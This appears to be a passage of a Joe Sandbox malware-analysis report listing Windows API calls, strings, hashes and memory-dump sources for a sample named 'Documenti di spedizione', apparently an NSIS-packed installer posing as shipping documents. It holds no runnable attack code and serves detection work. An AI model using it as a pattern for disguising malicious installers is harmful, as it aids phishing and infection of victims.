                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$H/B
                                                  • API String ID: 2624150263-2024176164
                                                  • Opcode ID: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                  • Instruction ID: d1d33be9ed2b3c34a6912e34267e60509d8c64d33f654f2361a06684bbdb7283
                                                  • Opcode Fuzzy Hash: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                  • Instruction Fuzzy Hash: FBA191B1900209ABDB11AFA5CD41AEFB7B8FF84754F11843BF601B62D1DB7C89418B69
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403109
                                                  • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00403125
                                                    • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,00437800,80000000,00000003), ref: 00406196
                                                    • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 004061B8
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 0040316E
                                                  • GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
                                                  Strings
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
                                                  • Inst, xrefs: 004031DA
                                                  • Error launching installer, xrefs: 00403145
                                                  • soft, xrefs: 004031E3
                                                  • Null, xrefs: 004031EC
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-787788815
                                                  • Opcode ID: b260e9cf65809c5e045d7eb05f3d0780ec45527b2fd5cc5e61384506655bc9c2
                                                  • Instruction ID: 4d59aa34fe8aef517225e0e03f455ac639a07fb2fd098cfe03fbce1fe051b31e
                                                  • Opcode Fuzzy Hash: b260e9cf65809c5e045d7eb05f3d0780ec45527b2fd5cc5e61384506655bc9c2
                                                  • Instruction Fuzzy Hash: 4671D071A00204ABDB20DFA4DD86BAE3EACAB04715F20457FE915B72C1CB789F418B5C
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(00427A00,00000400), ref: 00406801
                                                  • GetWindowsDirectoryW.KERNEL32(00427A00,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                  • SHGetPathFromIDListW.SHELL32(00000000,00427A00), ref: 00406875
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                  • lstrcatW.KERNEL32(00427A00,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                  • lstrlenW.KERNEL32(00427A00,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                  Strings
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004068A3
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 004067D2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-730719616
                                                  • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction ID: c05bc8db6a500faa8ceae89892d654845b9b7d80f8daaf315b7a9d2c48b59061
                                                  • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction Fuzzy Hash: CE6147B2A053019BEB20AF24DC84B6B77D8AF54314F26453FF587B26D0DA3C8961875E
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                  • GetSysColor.USER32(00000000), ref: 004046E3
                                                  • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                  • SetBkMode.GDI32(?,?), ref: 004046FB
                                                  • GetSysColor.USER32(?), ref: 0040470E
                                                  • SetBkColor.GDI32(?,?), ref: 0040471E
                                                  • DeleteObject.GDI32(?), ref: 00404738
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004027B8
                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 004027DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027F1
                                                    • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406289
                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040289D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: a549dd45bdf68c9719d70c69bb74270c52082c3b2606a719e6898ef3dc67c70c
                                                  • Instruction ID: 77fbecb4268093b3ffff8c623a80bd5bb6512b600f7762490a4bde5bc174ce64
                                                  • Opcode Fuzzy Hash: a549dd45bdf68c9719d70c69bb74270c52082c3b2606a719e6898ef3dc67c70c
                                                  • Instruction Fuzzy Hash: 9A511D75D04219AADF20EFD4CA85AAEBB79FF44304F14817BE501B62D0D7B89D82CB58
                                                  APIs
                                                  • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                  • lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                  • lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                  • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction ID: 5626e068ca8b5f19a977ecdc4b6aac72793d852c885f634865ceb3a8b40a731b
                                                  • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction Fuzzy Hash: 6F218E71900558FACB119F65DD849CFBFB9EF45350F10803AF904B62A0C7794A819F68
                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000), ref: 0040306E
                                                  • GetTickCount.KERNEL32 ref: 0040308C
                                                  • wsprintfW.USER32 ref: 004030BA
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                  • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                    • Part of subcall function 00403037: MulDiv.KERNEL32(?,00000064,?), ref: 0040304C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                  • Instruction ID: 97c902a025ac2946b461c4c6cbd0392064296d6115d029b2f7da86e316ad9030
                                                  • Opcode Fuzzy Hash: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                  • Instruction Fuzzy Hash: 5901A530542320EBCB31AF60AE0AA6B7F6CAB00702F54443BF441B15D5CAB84641CB9E
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                  • GetMessagePos.USER32 ref: 00404FFF
                                                  • ScreenToClient.USER32(?,?), ref: 00405019
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                  APIs
                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FD6
                                                  • wsprintfW.USER32 ref: 0040300A
                                                  • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction ID: bec97a1ff423586d6a5c987b60c5c02bd53578e49ae90ce5674df69195bed5dc
                                                  • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction Fuzzy Hash: 98F0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AF646B51D0DBB99A558F99
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                  • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 90865e7bdfac0d2ec63d9585e4062f151f8a9dd66d81cd5b57f304ac9c2b5374
                                                  • Instruction ID: 349357d0e6511a5e46fd8e19636faeb724d9b15f10a4c99f70335ec2520be7da
                                                  • Opcode Fuzzy Hash: 90865e7bdfac0d2ec63d9585e4062f151f8a9dd66d81cd5b57f304ac9c2b5374
                                                  • Instruction Fuzzy Hash: 2731B171D00124BBCF21AFA5DD89D9E7E79AF44364F14023AF415762E1CB794D418F68
                                                  APIs
                                                  • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                  • wsprintfW.USER32 ref: 00404F78
                                                  • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$H/B
                                                  • API String ID: 3540041739-2222257793
                                                  • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction ID: d50fdcff321319429c488fc01686433ffa638a32cb0890ada2b0e386a1fa8516
                                                  • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction Fuzzy Hash: 8B11A873A0412837DB00656D9D45E9E369C9B85374F154637FA26F31D1E979CC2182E8
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00434000,76233420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                  • CharNextW.USER32(?,00434000,76233420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                  • CharPrevW.USER32(?,?,76233420,00436800,00000000,00403640,00436800,00436800,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                  • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                  • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                  • wsprintfW.USER32 ref: 00406A78
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME
                                                  • API String ID: 2200240437-1106614640
                                                  • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                  • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,0040A5F8,00435000,?,?,00000031), ref: 004017D5
                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A5F8,0040A5F8,00000000,00000000,0040A5F8,00435000,?,?,00000031), ref: 004017FA
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1941528284-0
                                                  • Opcode ID: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                  • Instruction ID: adf8bb8e975ebc770d7c27afbe064fe35cfd0cbf1071ecc95f96a86e7a4b9e55
                                                  • Opcode Fuzzy Hash: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                  • Instruction Fuzzy Hash: 8A41C671900105BACF117BA5CD85DAE3A79EF45368F21823FF422B10E1D73D8E91AA2D
                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369050240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369064073.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.3369084192.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                  • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                  • Opcode Fuzzy Hash: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                  • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                  • GetClientRect.USER32(?,?), ref: 00401E0A
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                  • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3369036412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.3369021079.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
